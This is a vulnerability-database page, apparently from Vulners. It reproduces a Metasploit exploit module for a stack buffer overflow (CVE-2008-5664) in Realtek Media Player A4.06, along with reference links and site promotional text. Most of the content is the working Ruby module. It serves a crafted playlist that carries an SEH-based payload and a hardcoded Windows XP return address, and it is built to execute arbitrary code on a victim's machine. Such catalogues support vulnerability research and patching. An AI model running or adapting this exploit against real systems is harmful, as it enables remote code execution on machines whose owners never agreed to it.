Lucene search
K

Realtek Media Player Playlist Buffer Overflow

🗓️ 20 Dec 2008 01:49:40Reported by MC <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 19 Views

Realtek Media Player Playlist Buffer Overflow exploi

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-5664
16 Dec 200800:00
circl
CVE
CVE-2008-5664
18 Dec 200821:00
cve
Cvelist
CVE-2008-5664
18 Dec 200821:00
cvelist
Exploit DB
Realtek Media Player Playlist - Remote Buffer Overflow (Metasploit)
24 Nov 201000:00
exploitdb
NVD
CVE-2008-5664
19 Dec 200801:52
nvd
OpenVAS
Realtek Media Player Playlist Buffer Overflow Vulnerability
29 Dec 200800:00
openvas
OpenVAS
Realtek Media Player Playlist Buffer Overflow Vulnerability
29 Dec 200800:00
openvas
Packet Storm
Realtek Media Player Playlist Buffer Overflow.
26 Nov 200900:00
packetstorm
Prion
Stack overflow
19 Dec 200801:52
prion
Positive Technologies
PT-2008-6716 · Realtek · Realtek Media Player
18 Dec 200800:00
ptsecurity
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Realtek Media Player Playlist Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Realtek Media Player(RtlRack) A4.06.
        When a Realtek Media Player client opens a specially crafted playlist, an
        attacker may be able to execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'MC' ],
      'References'     =>
        [
          [ 'CVE', '2008-5664'],
          [ 'OSVDB', '50715'],
          [ 'BID', '32860' ],
        ],
      'Payload'        =>
        {
          'Space'           => 550,
          'BadChars'	  => "\x00",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Realtek Media Player(RtlRack) A4.06 (XP Pro All English)', { 'Ret' => 0x72d12899 } ], #  msacm32.drv 5.1.2600.0  (xpclient.010817-1148)
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2008-12-16',
      'DefaultTarget'  => 0))
  end

  def autofilter
    false
  end

  def check_dependencies
    use_zlib
  end

  def on_request_uri(cli, request)

    return if ((p = regenerate_payload(cli)) == nil)

    pla =  rand_text_alpha_upper(200)
    pla << generate_seh_payload(target.ret)
    pla << rand_text_alpha_upper(1266)

    print_status("Sending exploit")

    send_response_html(cli, pla, { 'Content-Type' => 'text/plain' })

    handler(cli)

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.9High risk
Vulners AI Score7.9
CVSS 29.3
EPSS0.78207
19